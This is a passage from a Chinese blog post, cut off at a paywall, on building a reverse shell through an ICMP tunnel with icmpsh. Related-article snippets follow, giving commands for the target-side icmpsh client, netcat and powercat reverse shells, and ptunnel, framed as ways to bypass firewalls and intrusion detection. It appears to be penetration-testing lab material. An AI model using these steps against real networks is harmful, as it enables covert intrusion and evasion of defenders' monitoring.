利用icmpsh建立icmp隧道反弹shell

最新推荐文章于 2024-07-24 18:17:55 发布
最新推荐文章于 2024-07-24 18:17:55 发布
阅读量758 收藏 4
点赞数
分类专栏: 网络安全 文章标签: 内网渗透 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xj28555/article/details/108798905
版权

首先在kali上安装icmpsh软件,软件地址https://github.com/inquisb/icmpsh.git

我们可以直接用git克隆过来git clone https://github.com/inquisb/icmpsh.git

1600501868_5f65b86c8b9ce40276a19.png!small

然后我们还需要来安装python-impacket类库以保证对TCP、UDP、ICMP等协议的访问

pip2 install impacket

1600506497_5f65ca81d66317fce621a.png!small

接下来我们还需要关闭我们之前的ping命令应答程序,这样可以防止内核自己对ping包进行响应。

sysctl -w net.ipv4.icmp_echo_ignore_all=1

实验完成后开启系统ping的话将最后的1改为0即可

1600502387_5f65ba732ebb5503d7b4a.png!small

然后可以在kali上开始监听

python icmpsh_m.py 本机ip 目标ip

最低0.47元/天 解锁文章
「已注销」
关注
专栏目录
内网隧道代理技术(二十五)之 ICMP隧道反弹SHELL
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-14 314
由于ICMP报文自身可以携带数据,而且ICMP报文是由系统内核处理的,不占用任何端口,因此具有很高的隐蔽性。把数据隐藏在ICMP数据包包头的data字段中,建立隐蔽通道,可以实现绕过防火墙和入侵检测系统的阻拦。
icmpsh.zip
05-17
内部网络中的大多数系统都位于防火墙和公司代理之后,以便控制入站和出站Internet流量。防火墙可以阻止反向并绑定TCP连接。但是大多数情况下允许ICMP流量。因此,可以将此协议用作隐蔽通道,以便获取shell并在目标主机上远程执行命令。
内网安全:隧道技术详解
最新发布
baimao__Ch的博客
07-24 978
Block)协议是一种在计算机网络中共享文件、打印机和其他资源的通信协议。它最初由微软开发,用于在局域网中的计算机之间共享文件和资源,445端口运行打印机共享:SMB协议支持打印机的共享,允许用户在网络中使用共享打印机进行打印操作。通过SMB协议,用户可以连接到其他计算机上的共享打印机,并发送打印任务进行打印。文件共享:SMB协议允许计算机之间共享文件和目录。通过SMB协议,用户可以在网络中访问其他计算机上的共享文件夹,并进行文件的读取、写入和管理操作。
icmpsh建立ICMP隧道
大方子
01-27 4792
Kali:192.168.61.145 Win7:192.168.61.128 Kali上先下载icmpsh git clone https://github.com/inquisb/icmpsh.git 安装python-impacket apt-get install python-impacket 关闭Kali系统自己的ping回复(实验完成后,记得设回0) 然后进入icmpsh文件夹内执行 # python icmpsh_m.py [攻击机IP][目标IP] python icmpsh_m
icmpsh搭建icmp隧道
hentai_uncle的博客
09-11 475
icmp隧道 icmpsh 使用kali作为攻击机, 使用win7作为受害机 kali安装icmpsh git clone https://github.com/inquisb/icmpsh.git apt-get install python-impacket //这步很可能存在问题 问题的解决方式: cp /etc/apt/sources.list /etc/apt/sources.list.bak //备份 vim /etc/apt/sources.list
icmp隧道--icmpsh
ddr12231的博客
09-24 300
本地:ubantu 目标主机:windows 在ubantu上关闭自带的icmp回应 sysctl -w net.ipv4.icmp_echo_ighore_all=1 ubantu上启动 pip install impacket python icmpsh_m.py ubantuIP WindowsIP windows上 icmpsh.exe -t UbantuIP 详细命令 -t...
ICMP隧道搭建
weixin_45007073的博客
04-09 1001
概述 ICMP隧道简单、实用,是一个比较特殊的协议。最常见的ICMP消息为ping命令的回复,攻击者可以利用命令行得到比回复更多的ICMP请求。在一些网络环境中,如果攻击者使用各类上层隧道(HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙,实现不受限制的网络访问。 攻击演示 这里我们使用icmpsh这款工具完成演示,这个工具的下载地址为https://git
Windows下反弹shell的方法
热门推荐
2ed
07-16 1万+
1.powercat反弹shell powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat 首先攻击者开启监听 nc -lvp 6666 或者使用powercat监听 powercat -l -p 6666 接着在目标机上反弹cmd shell:...
第三章——隐藏通信隧道技术
willow_liang的博客
12-22 3235
网络层隧道 1.pingtunnel 1.在web边界服务器上下载并运行ptunnel http://freshmeat.sourceforge.net/projects/ptunnel ptunnel -x pass -×指定icmp隧道连接验证密码 -lp指定要监听的本地tcp端口 -da指定要转发到的机器的ip地址 -dp指定要转发到的机器的tcp端口 -p指定icmp隧道另一端机器的ip地址 2.在vps上运行ptunnel ptunnel -p 192...
内网穿透从搭建到溯源(内网隧道搭建、绕过、隧道流量分析、日志分析、隧道防护)
墨痕诉清风的博客
02-24 4241
背景 在攻防博弈这个永久的话题中,永远不会缺少一个重要角色即内网穿透。当渗透测试人员在进入内网,需要扩大战果的时候,往往会遇到内网的一些防护策略,不外乎边界设备、防火墙及入侵检测设备对端口或者数据包的拦截,导致流量无法出网,此时就需要熟练掌握内网穿透技术,从复杂的内网环境中获取稳定的流量交互,从而达到目的。 本文针对边界安全设备等对内网端口的屏蔽及数据包的拦截,从不同的网络协议层进行搭建隧道进行绕过,并对不同类型的隧道流量或者日志进行分析,帮助攻击或防守人员从溯源的维度更好的掌握内网穿透技术。 .
icmpshicmp反弹shell
weixin_45729208的博客
03-31 369
一,技术原理 向ping www.baidu.com时,本机会先向百度的服务器发送ICMP请求包,如果请求成功了,则百度服务器会回应ICMP的响应包 引用百度百科: ICMP(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。 二,实验环境 攻击机
icmpsh使用
守拙的博客
07-11 1033
ICMP隧道:将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(防火墙通常不会过滤ping数据包),通常用于内网攻击中的绕过防火墙建立C2tongda。 常用的ICMP隧道工具有icmpsh、PingTunnel、icmptunnel、powershell icmp等。 下载地址:https://github.com/bdamele/icmpsh 使用前提: 目标主机为windows系统 本地机器安装python2环境,安装impacket类库 利用icmpsh
icmpsh:基于 ICMPshell 工具
gitblog_00096的博客
03-14 430
icmpsh:基于 ICMPshell 工具 icmpsh 是一个基于 ICMP(Internet Control Message Protocol)的 shell 工具,它允许你通过 ICMP 请求在目标主机上执行命令并获取结果。 什么是 ICMPICMP(Internet Control Message Protocol)是 Internet 协议簇的一部分,用于在网络中发送控制...
【内网流量操控技术六】icmp隧道icmpsh
redwand的博客
02-11 1672
今天是大年三十,先给大家拜个早年,虽然是年末最后一天,但对于有技术信仰的我们来说,其实每一天都是第0天,遂积跬步,记录一篇。前面我们学习了ssh隧道、dns隧道,这些隧道从tcp/ip七层协议来看,多是通过应用层或传输层协议穿透防火墙。那么当防火墙如果不开任何端口,我们应该如何穿透绕过防火墙出站规则呢,本节我们通过学习icmpsh来解决服务器未开端口时,如何通过icmp隧道穿透防火墙,其原理虽然简单,但动手一试发现有很多坑值得避免。
反向ICMP_shellicmpsh
bylfsj的博客
03-18 684
有时候,网络管理员使用各种各样的防火墙,对渗透测试是非常困难的,有种这样防火墙:一个允许已知的机器流量在端口和服务(入口过滤),并拥有强大的出口访问控制列表的设置。 当你已经拥有一台机器内部网络或者DMZ的一部分。他并非通过TCP来获得reverse shell的,所以不考虑绑定shell。 然而有关UDP,通常是一个DNS...
内网渗透系列:内网隧道icmpsh
闵行小鱼塘
04-10 1441
本文研究ICMP隧道的一个工具,icmpsh
内网穿透_ICMP_icmpsh
tubug的博客
03-28 1018
常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。数据包(例如:ping操作)的传输过程中,当目标主机不可达,或者请求超时,都是ICMP在运作(生成相应的错误信息)这样,当其他设备向你的机器发送 ICMP 请求时,icmpsh 可以截获这些请求并作出响应,而不是系统本身去响应。使用 icmpsh 工具时,它会监听网络上的 ICMP 请求,并模拟系统的 ICMP 去响应。为了防止系统本身去响应icmp,所以要关闭本机的icmp响应。
icmp协议_利用ICMP(icmpsh)协议反弹Shell 渗透红队笔记
weixin_39872257的博客
12-01 355
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 十篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),每周一更。ICMP隧道ICMP隧道是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定要开放端口,而在ICMP协议下就不需要。最常见的ICMP消息为Ping命令的回复,攻击者可以利用命令得到比回复更多的ICMP请求。在通常情况下...
windows 反弹shell
07-29
在Windows系统中,反弹shell是一种常见的攻击技术,用于获取对目标机器的远程访问权限。有几种常见的方法可以实现Windows反弹shell。 一种方法是使用Metasploit框架。首先,使用msfvenom生成一个powershell类型的木马,然后开启监听端口。目标机在命令提示符下执行生成的powershell脚本,即可实现反弹shell。需要注意的是,有时由于防火墙的原因,控制可能会不稳定。\[1\] 另一种方法是使用nc(netcat)工具进行反弹。通过nc反弹得到的shell可能不是一个完全交互的shell,某些命令可能无效。相比之下,通过Python脚本得到的shell可以实现对被控制主机的任意操作。\[2\] 此外,还有一些基于PowerShell的攻击框架,如Nishang,它集合了一些PowerShell攻击脚本和有效载荷,可用于反弹TCP/UDP/HTTP/HTTPS/ICMP等类型的shell。\[3\] 总结起来,Windows反弹shell的方法包括使用Metasploit框架、nc工具以及基于PowerShell的攻击框架。具体选择哪种方法取决于实际需求和环境。 #### 引用[.reference_title] - *1* *2* [Windows下反弹shell的方式](https://blog.csdn.net/ws1813004226/article/details/117248359)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Windows下反弹shell的方法](https://blog.csdn.net/qq_39101049/article/details/96191861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值